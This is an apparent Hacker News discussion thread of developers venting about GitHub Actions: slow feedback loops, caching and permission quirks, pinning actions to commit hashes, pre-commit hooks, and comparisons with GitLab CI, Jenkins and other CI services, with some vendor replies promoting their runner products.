When it takes all of a day to self host your own task runner on a laptop in your office and have better uptime, lower cost, better performance, and more correct implementations, you have to ask why anyone chooses GHA. I guess the hello-world is convincing enough for some people.
(1) https://github.com/actions/upload-artifact/issues/38
The world is full of kafkaesque nightmares of Dev-ops pipeline "designed" and maintained by committees of people.
It's horrible.
That said, for some personal stuff I have Google Cloud Build that has a very VERY simple flow. Fire, forget and It's been good.
But honestly, doesn't github now have a button you can press to retrigger actions without a commit?
GitHub Actions are least hassle, when you don't care about how much compute time you are burning through. Either because you are using the free-for-open-source repositories version, or because your company doesn't care about the cost.
If you care about the compute time you are burning, then you can configure them enough to help with that, but it quickly becomes a major hassle.
I wouldn't want to maintain GitHub actions for a large project involving 50 people and 5 languages...
I’ve noticed this phenomenon a few times already, and I think there’s nothing worse than having a 30-60s feedback loop. The one that keeps you glued to the screen but otherwise is completely nonproductive.
I tried for many moons to replicate GHA environment on local and it’s impossible in my context. So every change is like „push, wait for GH to pickup, act on some stupid typo or inconsistency, rinse, repeat”.
It’s like a slot machine „just one more time and it will run”, eating away focus and time.
It took me 25 minutes to get a 5s build process. A naive build with GHA? 3 minutes, because of dependencies et al. OK, let's add caching. 10 hours fly by.
The cost of failure and focus drop is enormous.
There has to be a better way. How has nobody figured this out?
https://github.com/nektos/act
I wish GitLab/GitHub would provide a way to do this by default, though.
If the process is longer than a few minutes, I can switch tasks while I wait for it. It's waiting for those things in the 3-10 minute range that is intolerable for me: long enough I will lose focus, not long enough for me to context switch.
Now I can bullshit with the LLM about something related to the task while I wait, which helps me to stay focused on it.
Recently switched to a company using Github, and assumed I'd be blown away by their offering because of their size.
Well, I was, but not in the way I'd hoped. They're absolutely awful in comparison, and I'm beyond confused how it got to that state.
If I were running a company and had to choose between the two, I'd pick Gitlab every time just because of Github actions.
I have some GitHub actions for some side projects and it just seems so much more confusing to setup for some reason.
If you want to make a CI performant, you'll need to use some of its features like caches, parallel workers, etc. And GHA usability really fall short there.
The only reason I put up with it is that it's free for open source projects and integrated in GitHub, so it took over Travis-ci a few years ago.
> For a Linux user, you can already build such a system yourself quite trivially by getting an FTP account, mounting it locally with curlftpfs, and then using SVN or CVS on the mounted filesystem. From Windows or Mac, this FTP account could be accessed through built-in software.
When the CLI didn't have support for what I needed
One of them being echoing text to a file. To me, your comparison makes no sense.
Every time someone introduced a new way to use someone else's shared magic I feel nervous about using it. Like GitHub Actions. Perhaps it's time for me to dig into them a bit more and try to understand if/how they're safe to use. But I seem to remember just a few days ago someone mentioning a GitHub action getting hijacked?
I will be stunned if this doesn't become a more popular attack vector over the next few years. Lots of valuable stuff sits in github, and they're a nearly-wide-open hole to access it.
For instance, AWS has a lot of actions they maintain to assist with common CI/CD needs with AWS services.
https://github.com/aws-actions
// Luckily still a gitlab user, but recently forced to Microsoft Teams and office.
my condolences to you and your team for that switch; it's my 2nd used-and-disliked thing (right next to atlassian) - oh well
but one cool feature i found with ms teams that zoom did not have (some years ago - no clue now) is turning off incoming video so you dont have to be constantly distracted in meetings
edit: oh yeah, re github actions and the user that said: > Glad I’m not the only one
me too, me too; gh actions seem frustrating (from a user hardly using gh actions, and more gitlab things - even though gitlab seems pretty wonky at times, too)
Because the docs are crap perhaps? I prefer it, having used both professionally (and Jenkins, Circle, Travis), but I do think the docs are really bad. Even just the nesting of pages once you have them open, where is the bit with the actual bloody syntax reference, functions, context, etc.
A few years back I wanted to throw in the towel and write a more minimal GHA-compatible agent. I couldn't even find where in the code they were calling out to GitHub APIs (one goal was to have that first party progress UI experience). I don't know where I heard this, so big hearsay warning, but apparently nobody at GitHub can figure it out either.
It's really upsetting how little attention Actions is getting these days (<https://github.com/orgs/community/discussions/categories/act...> tells the story -- the most popular issues have gone completely unanswered).
Sad to see Earthly halting development and Dagger jumping on the AI train :(. Hopefully we'll get a proper alternative.
On a related note, if you're considering https://www.blacksmith.sh/, you really should consider https://depot.dev/. We evaluated both but went with Depot because the team is insanely smart and they've solved some pretty neat challenges. One of the cooler features is that their caching works with the default actions/cache action. There's absolutely no need to switch out popular third party actions in favor of patched ones.
Hi, Dagger CEO here. We're advertising a new use case for Dagger (running AI agents) while continuing to support the original use case (running complex builds and tests). Dagger has always been a general purpose engine, and our community has always used it for more than just CI. It's still the exact same engine, CLI, SDKs and observability stack. It's not like we're discontinuing a product, to the contrary: we're getting more workloads on the platform, which benefits all our users.
I think what we're doing is different: we built a product that was always meant to be general purpose; encouraged our community to experiment with alternative use cases; and are now doubling down on a new use case, for the same product. We are still worried about the perception of a FOMO-driven AI pivot (and the reactions on this thread confirm that we still have work to do there); but we're confident that the product really is capable of supporting both.
Thank you for the thoughtful comments, I appreciate it.
Example:
https://github.com/actions/runner/pull/2477#issuecomment-244...
What happened there?
What makes Depot so fast is that they use NVMe drives for local caching and they guarantee that the cache will always be available for the same builders. So you don't suffer from the cold-start problem or having to load your cache from slow object storage.
We also do native multi-platform builds behind one build command. So you can call depot build —platform Linux/amd64,linux/arm64 and we will build on native Intel and ARM CPUs and skip all the emulation stuff. All of that adds up to really fast image builds.
Hopefully that’s helpful!
You wouldn't really have to change anything in your Dockerfile to leverage this and see a significant speedup.
The docs are here: https://docs.warpbuild.com/docker-builders#usage
Do people really consider this best practice? I disagree. I absolutely don't want CI touching my code. I don't want to have to remember to rebase on top of whatever CI may or may not have done to my code. Not all linters are auto-fixable so anyway some of the time I would need to fix it from my laptop. If it's a trivial check it should run as a pre-commit hook anyway. What's next, CI should run an LLM to auto-fix failing test cases?
Do people actually prefer CI auto-fixing anything?
Doing it in CI sounds like making things more complicated by resetting to remote branches after pushing commits. And, in the worst case, something that actually breaks code that works locally.
Why do they have a say in this? This is up to tech leadership to set standards that need to be followed.
I’m also with the other commenter about setting these things at the editor level, but also at the pre-push level.
We benchmark how long it takes to format/lint only changed files, usually no more than a second, maybe two, but I admit for some languages this may take more. An editor with a language server properly setup would have helped you find issues earlier.
We also have reports for our CI pipeline linters, so if we see more than 1 report there, we send a message to the team: it means someone didn’t set up their editor or their git hooks.
If the checks take more than a second, yeah, pre-commit is probably not the place/moment. Reliability is important, but so is user experience. I’ve worked at companies that ran the unit test suite at the pre-commit level, and that is NOT fine. While it sounds like it’ll find issues earlier, it’ll screw your developers’ time if they have to wait seconds/minutes each time they fix a comma.
Because at the institutional level, there isn’t the appropriate will to mandate that devs fix their local environments, and I don’t feel like burning my own political capital on that particular fight.
Agreed on the performance comments.
I'd rather have linting pushed into the editing process, within my IDE/VS Code/vim plugins, whathaveyou, where it can feedback-loop with my actual writing process and not just be some ancillary command I run with lots of output I never read.
We have a lot of IDE checks, but they’re just warnings when debugging (because devs complained, IMO reasonably, that having them as errors during dev was too inconvenient during development/debugging). CI fails with any warnings, and we have devs who don’t bother to check their IDE warnings before committing and pushing to a PR.
Trivial mistakes in PRs are almost always signs of larger errors.
(Most of the time, the auto-fix is just running "cargo fmt".)
Things like 10 GB cache limits in GitHub, concurrency limits based on runner type, the expensive price tag for larger GitHub runners, and that's before you even get to the security ones.
Having been building Depot[0] for the past 2.5 years, I can say there are so many foot guns in GitHub Actions that you don't realize until you start seeing how folks are bending YAML workflows to their will.
We've been quite surprised by the `container` job. Namely, folks want to try to use it to create a reproducible CI sandbox for their build to happen in. But it's surprisingly difficult to work with. Permissions are wonky, Docker layer caching is slow and limited, and paths don't quite work as you thought they did.
With Depot, we've been focusing on making GitHub Actions exponentially faster and removing as many of these rough edges as possible.
We started by making Docker image builds exponentially faster, but we have now brought that architecture and performance to our own GHA runners [1]. Building up and optimizing the compute and processes around the runner to make jobs extremely fast, like making caching 2-10x faster without having to replace or use any special cache actions of ours. Our Docker image builders are right next door on dedicated compute with fast caching, making the `container` job a lot better because we can build the image quickly, and then you can use that image right from our registry in your build job.
All in all, GHA is wildly popular. But the sentiment, even among its biggest fans, is that it could be a lot better.
[0] https://depot.dev/
[1] https://depot.dev/products/github-actions
I guess that would be reasonable if we really needed the speedup, but if you're also offering a better QoL GHA experience then perhaps another tier for people like us who don't necessarily need the blazing speed?
We are fully usage based, no minimums etc., and our container builders are faster than others on the market.
We also have a BYOC option that gives 10x cost reduction and used by many customers at scale.
[0] https://warpbuild.com
10,000,000,000 bytes should be enough for anyone! It really is a lot of bytes...
I used GitHub actions when building a fin services app, so I absolutely used the hash to specify Action dependencies.
I agree that this should be the default, or even the required, way to pull in Action dependencies, but saying "almost no one does" is a pretty lame excuse when talking about your own risk. What other people do has no bearing on your options here.
Pin to hashes when pulling in Actions - it's much, much safer
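For anyone unfamiliar, the difference is one line in the workflow. The SHA below is a placeholder, not a real release commit; look up the actual commit in the action's repository:

```yaml
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      # Tag pinning: mutable, the tag can be re-pointed at malicious code.
      #   - uses: actions/checkout@v4
      # Hash pinning: immutable, you get this exact commit or nothing.
      # (The SHA here is a placeholder; use the real release commit.)
      - uses: actions/checkout@0000000000000000000000000000000000000000 # v4
```

Dependabot and Renovate both understand pinned SHAs and can keep them updated while preserving the trailing version comment.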
"Defaults matter" is a common phrase, but equally true is: "the pattern everyone recommends including example documentation matters".
It is fair to criticise the usage of GH Actions, just like it's fair to criticise common usage patterns of MySQL that eat your data - even if smarter individuals (who learn from deep understanding, or from being burned) can effectively make correct decisions, since the population of users are so affected and have to learn the hard way or be educated.
Yes, your builds will work as expected for a stretch of time, but that period will come to an end, eventually.
Then one day you will be forced to update those pinned dependencies and you might find yourself having to upgrade through several major versions, with breaking changes and knock-on effects to the rest of your pipelines.
Allowing rolling updates to dependencies helps keep these maintenance tasks small and manageable across the lifetime of the software.
Just make sure you don’t leak secrets to your PRs. Also I usually review changes in updated actions before merging them. It doesn’t take that much time, so far I’ve been perfectly fine with doing that.
[1]: https://docs.renovatebot.com/modules/manager/github-actions/...
Though, yes, I prefer pinning dependencies for my personal projects. I don't see why things should break when I explicitly keep them the same.
The real problem is security vulnerabilities in these pinned dependencies. You end up making a choice between:
1. Pin and risk a malicious update.
2. Don't pin and have your dependencies get out of date and grow known security vulnerabilities.
This is for composite actions. For JS actions, what if they don't lock dependencies but pull whatever the newest package is at action setup time? Same issue.
Would have to transitively fork everything and pin it myself, and then keep it updated.
As for reducing boilerplate in the CI configs, GitHub Actions is a programming language with support for functions! It's just that function calls can only appear in very limited places in the program (only inside `steps`), and to define a function, you have to create a Git repository. The function call syntax is also a bit unusual, it's written with the `uses` keyword. So there is a lot of boilerplate that you can't remove this way, though there are several other yaml eDSLs hidden in GitHub Actions that address some points of it. E.g. you can create loops with `matrix`, but again, not general-purpose loops, they can only appear in a very specific syntactic location.
To really deduplicate stuff, rather than copy-pasting blocks of yaml, without using a mix of these special yaml eDSLs, in the past I've used Nix and Python to generate json. Now I'm using RCL for this (https://rcl-lang.org). All of them are general-purpose yaml deduplicators, where you can put loops or function calls anywhere you want.
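As a toy sketch of that approach (not the commenter's actual RCL/Nix setup; the job names and script path are invented): since JSON is a subset of YAML, you can build a workflow with ordinary Python loops and comprehensions instead of the `matrix` eDSL:

```python
import json

# Generate one test job per OS with a real loop instead of `matrix`.
oses = ["ubuntu-latest", "macos-latest"]

workflow = {
    "name": "ci",
    "on": ["push"],
    "jobs": {
        f"test-{os_.split('-')[0]}": {
            "runs-on": os_,
            "steps": [
                {"uses": "actions/checkout@v4"},
                {"run": "./ci/test.sh"},  # hypothetical script
            ],
        }
        for os_ in oses
    },
}

# JSON is valid YAML, so this output can be written straight to
# .github/workflows/ci.yml (or piped through a YAML serializer).
print(json.dumps(workflow, indent=2))
```

The same trick scales to functions: a plain Python function that returns a job dict is a reusable "action" with none of the one-repo-per-function overhead.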
FYI there is also `on: workflow_call` which you can use to define reusable jobs. You don't have to create a new repository for these
https://docs.github.com/en/actions/writing-workflows/workflo...
In my experience, the best strategy is to minimize your use of it — call out to binaries or shell scripts and minimize your dependence on any of the GHA world. Makes it easier to test locally too.
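A minimal sketch of that strategy (script paths are hypothetical): the workflow file is a thin trigger, and everything else is ordinary version-controlled code you can also run on a laptop:

```yaml
name: ci
on: [push]
jobs:
  ci:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      # All real logic lives in the scripts, not in YAML, so
      # `./ci/build.sh && ./ci/test.sh` works identically on a dev machine.
      - run: ./ci/build.sh
      - run: ./ci/test.sh
```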
I have done something similar with Jenkins and groovy CI library used by Jenkins pipeline. But it wasn't super simple since a lot of it assumed Jenkins. I wonder if there is a more cleaner open source option that doesn't assume any underlying platform.
Like teams.
GitHub Actions is the worst possible CI platform - except for all the others. Every single CI platform has weird limitations, missing features, gotchas, footguns, pain points. Every single one requires workarounds, leaves you tearing your hair out, banging the table trying to figure out how to do something that should be simple.
Of all of them I've tried, Drone is the platonic ideal of the best, simplest, most generally useful system. It is limited. But that limitation is usually easy to work around and doesn't impose artificial constrictions. However, you won't find nearly as many canned solutions or plugins as GitHub Marketplace, and the enterprise features are few.
GHA is great because of things like Dependabot, and the million canned Marketplace actions, and it's all tightly integrated with GH's features, so you don't have to work hard to get anything advanced or specific to work. Tight integration can save you weeks to months of development time on a CI solution. I've literally seen teams throw out versioning of dependencies entirely because they weren't updating their dependencies, because there's no Dependabot orb for CircleCI. If they had just been on GHA using Dependabot it would have saved them literal years of headaches.
Jenkins is, ironically, both the most full-featured, and the absolute worst to configure/maintain. Worst design, worst security, worst everything... except it does have a plugin for everything, and a UI for everything. I hate it with the fire of a million suns. But people won't stop using it, partially because it's so goddamn configurable, and they learned it years ago and won't stop using it. If anyone wants to write a replacement, I'm happy to help (I even wrote a design doc!).
Anyone who claims that GHA is garbage and any of the others are amazing is either doing something very basic or is crazy, or lying.
At the end of the day, you run shell scripts and commands using a YAML based config language (except for Jenkins). Amazingly, it's hard to build something that does that with the right abstractions and compromises between flexibility and good hygiene.
That may have been true before GitHub decided that PRs can't access repository secrets anymore. Apparently now you can at least add these secrets to Dependabot too (which is still duplicate effort for setup and any time you rotate secrets), but at the time when the change was introduced there were only weird workarounds.
I'm surprised nobody has mentioned dependabot yet. It automates this, keeping action dependencies pinned by hash automatically whilst also bringing in stable upgrades.
The only automation that I know of is cargo vet. Although it doesn’t work for GitHub Actions, the idea sounds useful. Basically, vet allows people who trust each other to vet updates. So one person verifies the diff and then approves the changes. Next, everyone who trusts this person can update the dependency automatically since it has been “vetted”.
[1]: https://github.com/mozilla/cargo-vet
We also, to your point, need more labels than @latest. Most of the time I want to wait a few days before taking latest, and if there have been more updates since that version, I probably don't want to touch anything for a little bit.
Common reason for 2 releases in 2 days: version 1 has a terrible bug in it that version 2 tries to fix. But we won't be certain about that one either until it's been a few more days with no patch for the patch for the patch.
For autoscaling we use terraform-aws-github-runner which will bring up ephemeral AWS machines if there are CI jobs queued on GitHub. Machines are then destroyed after 15 minutes of inactivity so they are always fresh and clean.
For defining build pipelines we use Nix. It is used both for building various components (C++, Go, JS, etc) as well as for running tests. This helps to make sure that any developer on the team can do exactly the same thing that the CI is doing. It also utilizes caching on an S3 bucket so components that don't change between PRs don't get rebuilt and re-tested.
It was a bit of a pain to set up (and occasionally a pain to maintain), but overall it's worth it.
My experience is this works for simple scripts but immediately falls apart when you start to do things like “don’t run the entire battery of integration tests against a readme change”, or “run two builds in parallel”, or “separate the test step from the build and parallelise it even if the build is serial”.
It’s easy to wrap make build and go about your life, but that’s no easier than just using the GitHub action to call go build or mvn build. The complexity comes in “pull that dependency from this place that is in a private repository on GitHub/AWS because it’s 100x faster than doing it from its source”, and managing the credentials etc for all of that stuff. This is also where the “it differs from running locally” comes into it too, funnily enough.
Alongside those, I also used Travis CI and AppVeyor for projects. And they all had the same (commit and pray) setup that I hate. I wish „act“ were a tool directly maintained by the GitHub folks, though.
https://github.com/nektos/act
I'm so much happier on projects where I can use the non-declarative Jenkins pipelines instead of GH Actions or BB pipelines.
These YAML pipelines are bad enough on their own, but throw in a department that is gatekeeping them and use runners as powerful as my Raspberry Pi and you have a situation where a lot of developers just give up and run things locally instead of the CI.
I think there's a place for making a builder that looks imperative, but can work out a tree of actions and run them. Gulp is a little bit this way, but again I haven't tried to breakpoint through it either.
If the next evolution in DevEx is not caring about what your code looks like in a stepping debugger, then the one after it will be. Making libraries that present a tight demo app for the Readme.md file and then are impossible to do anything tricky with or god forbid debug just needs to fucking stop. Yesterday. And declarative systems are almost always the worst.
It looks like they have a very specific and unique build process which they really should handle with something more customizable like Jenkins. Instead they're using something that's really intended for quick and light deployments for intense dev ops setup.
I really like GitHub actions, but I'm only doing very simple things. Don't call a fork bad because it's not great when you're eating soup
They either just write a long blog post about how they can't screw in nails with a hammer.
Or they leave their security rules wide open and about half the comments are like, we need tools which stop us from doing stupid things.
No other industry works like this.
What it really does is fire off a webhook. Repository custom properties and the name of the action are properties that are included in the workflow_job webhook. With this you can do anything you want and you're not at all constrained by YAML or runners.
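A sketch of consuming that webhook (the field names follow GitHub's `workflow_job` event payload; the routing logic and the `"big-build"` label are invented for illustration):

```python
# Minimal dispatcher for `workflow_job` webhook deliveries: react to
# newly queued jobs and decide what capacity to provision for them.

def handle_workflow_job(event):
    if event.get("action") != "queued":
        return None  # ignore in_progress/completed deliveries
    labels = event["workflow_job"]["labels"]
    if "self-hosted" not in labels:
        return None  # GitHub-hosted job; nothing for us to do
    # Route on the job's runner labels, e.g. a bigger VM for heavy builds.
    return "large" if "big-build" in labels else "small"

# Example payload, trimmed to the fields we actually read:
evt = {"action": "queued",
       "workflow_job": {"labels": ["self-hosted", "big-build"]}}
```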
If they had, we'd be reading a different article about how terribly complex and unintuitive Jenkins is.
CI is just a very very hard problem and no provider makes it easy.
[1] https://github.com/actions/runner/blob/6654f6b3ded8463331fb0...
I had a coworker who called it Visual Sorta-Safe which is just about the best parody name I've ever heard in my entire career.
If one action pushes a tag to the repo, `on:tag` does not trigger. The workaround apparently is to make the first action push the tag using a custom SSH key, which magically has the ability to trigger `on:tag`.
The workaround is to use a token tied to you instead of GitHub Actions, so you get charged (or run out of quota).
You get charged no matter what, a personal access token doesn’t change anything.
If they are concerned about infinite loops then put a limit on how many workflows can be triggered by another workflow. Each time a workflow chains off another, pass along some metadata of “runsDeep” and stop when that hits X, which can be configured.
No, requiring a PAT to kick off a workflow from a workflow is gross and makes zero sense. I don’t want every tag associated with my user, I want it to be generic, the repo itself should be attributed. The only way to solve this is to create (and pay for) another GH user that you create PAT tokens under. A bunch of overhead, cost, and complexity for no good reason.
> When you use the repository's GITHUB_TOKEN to perform tasks, events triggered by the GITHUB_TOKEN, with the exception of `workflow_dispatch` and `repository_dispatch`, will not create a new workflow run.
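The commonly used workaround, sketched below (the secret name is hypothetical): push with a deploy key or PAT instead of the default GITHUB_TOKEN, so the tag does trigger downstream workflows:

```yaml
jobs:
  release:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          # Pushing over this key instead of the default GITHUB_TOKEN
          # means the tag push below WILL trigger `on: push: tags` runs.
          ssh-key: ${{ secrets.DEPLOY_KEY }}  # hypothetical secret name
      - run: |
          git tag "v1.2.3"
          git push origin "v1.2.3"
```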
It has bitten me in the rear before too. I use this pattern a lot when I publish a new version, which tags a piece of code and then marks assets as part of that version (for provenance reasons I cannot rebuild code).
I'm using GitHub Actions to easily reuse some predefined job setup (like installing a certain Python version on Linux, macOS, Windows runners). For these types of tasks, I find GitHub Actions very useful and convenient. If you want to reuse predefined jobs, written by someone else, with GitLab CI/CD, what can I use?
https://docs.gitlab.com/ci/yaml/#includeremote
Since the integration is done statically, it means gitlab can provide you a view of the pipeline script _after_ all components were included, but without actually running it.
We are using this and it is so nice to set up. I have a lot of gripes with other gitlab features (e.g. environments, esp. protected ones and their package registry) but this is one they nailed so far.
1: although TIL that the "script:" field itself is actually required in GLCI https://docs.gitlab.com/ci/yaml/#script
There is a GitLab CI feature `include`, but you pretty much have to write shell scripts inside YAML, losing the whole developer experience (shellcheck etc.). I would recommend this route only if you can't factor your code into a CLI in a proper language.
* Barely reproducible because things like the settings of the server (environment variables are just one example) are not version controlled.
* Security is a joke.
* Programming in YAML or any other config format is almost always a mistake.
* Separate jobs often run in their own container, losing state like build caches and downloaded dependencies. Need to be brought back by adding remote caches again.
* Massive waste of resources because too many jobs install dependencies again and again or run even if not necessary. Getting the running conditions for each step right is a pain.
* The above points make everything slow as hell. Spawning jobs takes forever sometimes.
* Bonus points if everything is locked down and requires creating tickets.
* Costs for infra often keep expanding towards infinity.
We already have perfectly fine runners: the machines of the devs. Make your project testable and buildable by everyone locally. Keep it simple and avoid (brittle) dependencies. A build.sh/test.sh/release.sh (or in another programming language once it gets more complicated, see Bun.build, build.zig) and a simple docker-compose.yml that runs your DB, Pub-Sub or whatever. Works pretty well in languages like Go, Rust or TS (Bun). Having results in seconds even if you are offline or the company network/servers have issues is a blessing for development.
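The single-entrypoint idea can be sketched like this (the task names and echoed commands are placeholders for your real build/test invocations):

```shell
#!/usr/bin/env sh
# ci.sh -- one entrypoint that both laptops and the CI runner call,
# so the pipeline definition shrinks to "run this script".
set -eu

run_task() {
  case "$1" in
    build) echo "build ok" ;;  # stand-in for e.g. `go build ./...`
    test)  echo "tests ok" ;;  # stand-in for e.g. `go test ./...`
    *)     echo "unknown task: $1" >&2; return 1 ;;
  esac
}

run_task "${1:-build}"
```

Locally you run `./ci.sh test`; in the pipeline the job body is also just `./ci.sh test`, so there is nothing to debug that you cannot reproduce offline.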
There are still things like the mentioned heavy integration tests, merges to main and the release cycle where it makes sense to run it in such environments. I'm just not happy how this CI/CD environments work and are used currently.
- env vars can be scripted, either in YAML or through dotenv files. Dotenv files would also be portable to dev machines
- how is security a joke? Do you mean secrets management? Otherwise, i don't see a big issue when using private runners with containers
- jobs can pass artifacts to each other. When multiple jobs are closely intertwined, one could merge them?
- what dependency installation do you mean? You can use prebuilt images with dependencies for one. And ideally, you build once in a pipeline and use the binary as an artifact in other jobs?
- in my experience, starting containers is not that slow with a moderately sized runner (4-8 cpus). If anything, network latency plays a role
- not being able to modify pipelines and check runners must be annoying, I agree
- everything from on-prem license to SaaS license keeps costing more. Somewhere, expenses are made, but that can be optimized if you are in a position to have a say?
By comparing dev machines to runners, you miss some important aspects: portability, automation, and testing in different environments. Unless you have a full container engine on your dev machine with flexible network configs, issues can be missed. Also, you need to prime every dev to run the CI manually or work with hooks, and then you can have funny, machine-specific problems. So this already points to a central CI system that makes builds repeatable in the same from-scratch environment. As for deployments, those shouldn't be made from dev machines, so automated pipelines are the go-to here. Automated test reporting also goes out the window on dev machines.
Env vars can be scripted, many companies use a tree of instance/group/project scoped vars though, leading to easily breaking some projects when things higher up change. Solvable for sure, guidelines in companies make it a pain. There are other settings like allowed branch names etc. that can break things.
With security, yes I mean mostly secrets management. Essentially everyone who can push to any branch has access to every token. Or just having a typo or mixing up some variables lead to stuff being pushed to production. Running things in the public cloud is another issue.
Passing artifacts between jobs is a possibility. Still leads to data pushed between machines. Merging jobs is also possible, just defeats the purpose of having multiple jobs and stages. The examples often show a separation between things like linting, testing, building, uploading, etc. so people split it up.
With dependencies I mean everything you need to execute jobs: OS, libraries, tools like curl, npm, poetry, jfrog-cli, whatever. Prebuilt images work, but it is another thing you have to do yourself: building more containers, storing them, downloading them. Also, containers are not composable, so each project or job has its own. The curse of being stateless and the way Docker works.
Starting containers is not slow on a good runner. But I noticed significant delays on many Kubernetes clusters, even if the nodes are <1% CPU. Startup times of >30s are common. Still, even if it would be faster it is still a delay that quickly adds up if you have many jobs in a pipeline.
I agree that dev machines and runners have different behavior and properties. What I mean is local-first development. For most tasks it is totally fine to run a different version of Postgres, Redis and Go for example. Docker containers bring it even closer to a realistic setup. What I want is quick feedback and being able to see the state of something when there are bugs. Not needing to do print debugging via git push and waiting for pipelines. Pipelines that set up a fresh environment and tear it down after are nice for reproducibility, but prevent me from inspecting the system aside from logs and other artifacts. Certainly this doesn't mean you shouldn't have a CI/CD environment at all, especially for releases/production deployments.
Simple scripts like these are enough for most projects and it is a blessing if you can execute them locally. Having a CI platform doing it automatically on push/merge/schedule is still possible and makes migrations to other platforms easier.
For real tho, not every project can be built by everyone locally, but at least parts of it should be locally runnable for devs to be able to work (at all IMO). What I am noticing is more and more coding is being done on some server somewhere (GitHub Codespaces, anyone? Google Colab? etc.)
What I am also noticing with tools like GH-A is that there is not really a way to test the CI code other than... commit, push, wait, commit, push, wait... That's just absurd to me. Obviously all CIs have some quirks where sometimes you have to _just run it_ and see if it works, but here it's like that for everything! Absurd, I say!
Laptops are a lot cheaper than the cloud bills I have seen so far. Penny-pinching over every tiny thing under $100/€100, but cloud seems to run on an infinite magic budget...
Your opinions are so regressive you really should consider going into management.
Nowhere do I say you shouldn't use CI/CD at all. I just don't like the current CI/CD implementations and the environments/workflows companies I worked for so far provide on top of them.
The regressive thing is putting everything ONLY on a remote machine with limited access and control, taped together by a quirky YAML-based DSL as a programming language and still requiring me to program most stuff myself.
$ git l
* cbe9658 8 weeks ago rejschaap (HEAD -> add-ci-cd) Update deploy.yml
* 0d78a6e 8 weeks ago rejschaap Update deploy.yml
* e223056 8 weeks ago rejschaap Update deploy.yml
* 8e1e5ea 8 weeks ago rejschaap Update deploy.yml
* 459b8ea 8 weeks ago rejschaap Update deploy.yml
* a104e80 8 weeks ago rejschaap Update deploy.yml
* 0e11d40 8 weeks ago rejschaap Update deploy.yml
* 727c1d3 8 weeks ago rejschaap Create deploy.yml
Totally agree with other comments saying to keep as much logic out of CI config as possible. Many CI features are too convoluted for their own good. Keep it really simple. You can use any CI platform and have a shit time if you don't take the right approach.
This also reduces the lock in by orders of magnitude.
I wonder why they chose to move back to Github Actions rather than evaluate something like Buildkite? At least they didn't choose Cloud Build.
I think incremental progress in the CI front is chugging along nicely, and I really haven't seen any breathtaking improvements from other solutions I've tried, like CircleCI.
The article is what you end up finding after that stage has been gone through.
The conclusion of course is that whoever invented this stuff really wasn't thinking clearly and certainly didn't have the time to write decent documentation to explain what they were thinking. And now the whole world has to try to deal with their mess.
My theory as to how this ends up happening is that the people creating the thing began with some precursor thing as their model. They made the new thing as "old thing, with a few issues fixed". Except they didn't fully understand the concepts in that thing, and we never got to see that thing. You'll see many projects that have this form: bun is "yarn fixed". Yarn is "npm fixed". And so on. None of these projects ever has to fully articulate their concepts.
Instead, have tooling to do that before committing (vscode format-on-save, or manually run a task), then have a pre-commit hook just do a sanity-check on that. It only needs to check modified files, so usually very fast.
Then, have an additional check on CI to verify formatting on all files. That should rarely be triggered, but helps to catch cases where the hooks were not run, for example from external contributes. That also makes it completely fine for this CI step to take a couple of minutes - you don't need that feedback immediately.
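The split can be sketched as one shared check with two call sites (function names invented; a real hook would get the staged list from `git diff --cached --name-only --diff-filter=ACM`, and `is_formatted` would shell out to your formatter's check mode, e.g. `gofmt -l` or `black --check`):

```python
def files_needing_format(files, is_formatted):
    """Return the files the formatter would change."""
    return [f for f in files if not is_formatted(f)]

# Pre-commit hook: fast path, staged files only.
staged = ["app/main.py", "app/util.py"]  # stand-in for `git diff --cached`
is_formatted = lambda f: f.endswith("util.py")  # stand-in formatter check

print(files_needing_format(staged, is_formatted))  # -> ['app/main.py']

# CI: slow path over the whole tree, catching commits made without hooks.
# Same function, just fed every tracked file instead of the staged ones.
```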
Though it would be sort of interesting or maybe just amusing if you made something like ssh-agent but for 'git commit' and your test runner. Only allow commits when all files are older than your last green test run.
You have no idea how much I'd love that feature. Inasmuch as "save" is still a thing anyway. I don't miss explicit saves in IDEA, I see commit as the "real" save operation now, and I don't mind being able to hook that in an IDE-independent way.
I think the UX of git hooks has been sub-par for sure, but tools like the confusingly named pre-commit are helping there.
I don’t want to think about formatting, I just want everything to be consistent. A pre commit hook can run those tools for me, and if any changes occurred, it can add them to the commit.
If people want to die on a hill that is demonstrably causing problems for all of their coworkers then let em.
Example config: https://github.com/anttiharju/vmatch/blob/9e64b0636601c236a5...
[0] : https://man.sr.ht/builds.sr.ht/
I don't use sourcehut, but interpreting what you wrote I'd argue this is an antifeature and would be a dealbreaker for me. CI typically evolves with the underlying code and decoupling that from the code makes it difficult to go backwards. It loses cohesion.
If you put the build files in a .builds/ folder at the root of your repository, they will be run upon each commit. Just like in github or gitlab. You are just not forced into this way of life.
If you prefer, you can store the build files separately, and run them independently of your commits. Moreover, the build files don't need to be associated to any repository, inside or outside sourcehut.
https://news.ycombinator.com/item?id=18983586
https://rewiring.bearblog.dev/blog/?q=azure
PS: I am not the author of any of these posts.
The worst kind of downtime is when you go down but nobody else has.
Documentation for GitHub Actions says, "If you specify the access for any of these permissions, all of those that are not specified are set to none." The article says "I do think a better "default" would be to start with no privileges and require the user to add whatever is needed", and this is apparently already the case once you explicitly add a "permissions" key to your GitHub Actions file. So the "default permissions" only apply if you do not add a "permissions" key at all; or maybe that is not what it means and the documentation is confusing, in which case it should be corrected. Anyways, you can also change the default permission setting to restrictive or permissive (and it probably ought to be restrictive by default).
Allowing finer-grained permissions to be set would probably also help.
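For illustration, the explicit opt-in looks like this; per the documented behavior, every scope not listed becomes `none`:

```yaml
permissions:
  contents: read   # enough for checkout; issues, packages, etc. become none

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: ./build.sh   # hypothetical build script
```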
Stop rebasing.
This should only happen if absolutely necessary to fix major merge mistakes.
Rebasing changes history and I've seen more problems prevented from removing it as a CI strategy.
Every CI strategy I've seen relying on rebasing had a better alternative in SDLC. You just need to level up your project management, period.
It also has the problem of not having a local dev runner for actions. The "inner loop" is atrociously slow and involves spamming your colleagues with "build failed" about a thousand times, whether you like it or not.
IMHO, a future DevOps runner system must be an open-source, local-first. Anything else is madness.
Right now we're in the "mainframe era" of DevOps, where we edit text files in baroque formats with virtually no tooling assistance, "submit" that to a proprietary batch system on a remote server that puts it into a queue... then come back after our coffee to read through the log printout.
I should buy a dot matrix printer to really immerse myself into the paradigm.
